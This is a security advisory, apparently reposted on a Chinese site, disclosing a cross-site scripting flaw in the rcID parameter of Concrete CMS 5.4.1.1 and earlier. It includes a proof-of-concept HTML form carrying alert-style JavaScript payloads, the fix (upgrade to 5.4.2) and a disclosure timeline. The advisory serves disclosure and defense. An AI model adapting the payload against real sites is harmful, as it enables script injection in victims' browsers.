YGN Ethical Hacker Group (lists yehg net) Concrete CMS 5.4.1.1 <= Cross Site Scripting
1. 概述
Concrete CMS 5.4.1.1及低版本脚本跨站缺陷
2. 背景
Concrete5 makes running a website easy. Go to any page in your site, and a editing toolbar gives you all the controls you need to update your website. No intimidating manuals, no complicated administration interfaces - just point and click.
3. 缺陷描述
The rcID parameter is not properly sanitized, which allows attacker to conduct Cross Site Scripting attack. This may allow an attacker to create a specially crafted URL that would execute arbitrary script code in a victim's browser.
4. 影响版本
<= 5.4.1.1
5. PROOF-OF-CONCEPT/EXPLOIT
vulnerable parameter: rcID
<form action=" http://[HdhCmsTest2cto测试数据]/Concrete/index.php/login/do_login/ " method="post"> <input type="hidden" name="uName" value="test" /> <input type="hidden" name="uPassword" value="test" /> <input type="hidden" name="rcID" value='" style=display:block;color:red;width:9999;height:9999;z-index:9999;top:0; left:0;background-image:url(javascript:alert(/XSS/));width:expression(al ert(/XSS/)); onmouseover="alert(/XSS/)' /> <input type="submit" name="submit" value="Get Concrete CMS 5.4.1.1 XSS" /> </form>
6. SOLUTION
Upgrade to 5.4.2 or higher.
7. VENDOR
Concrete CMS Developers http://HdhCmsTestconcrete5.org/
8. CREDIT
This vulnerability was discovered by Aung Khant, http://yehg.net , YGN Ethical Hacker Group, Myanmar.
9. DISCLOSURE TIME-LINE
2011-04-14: vulnerability reported 2011-08-04: vendor released fixed version 2011-08-23: vulnerability disclosed
10. REFERENCES
Original Advisory URL: http://yehg.net/lab/pr0js/advisories/[concrete_5.4.1.1]_cross_site_scrip ting Project Home: http://HdhCmsTestconcrete5.org/ Vendor Release Note: http://HdhCmsTestconcrete5.org/documentation/background/version_history/5-4-2 - release-notes/
#yehg [2011-08-23]
查看更多关于Concrete CMS 5.4.1.1及更低版本跨站脚本缺陷及修复的详细内容...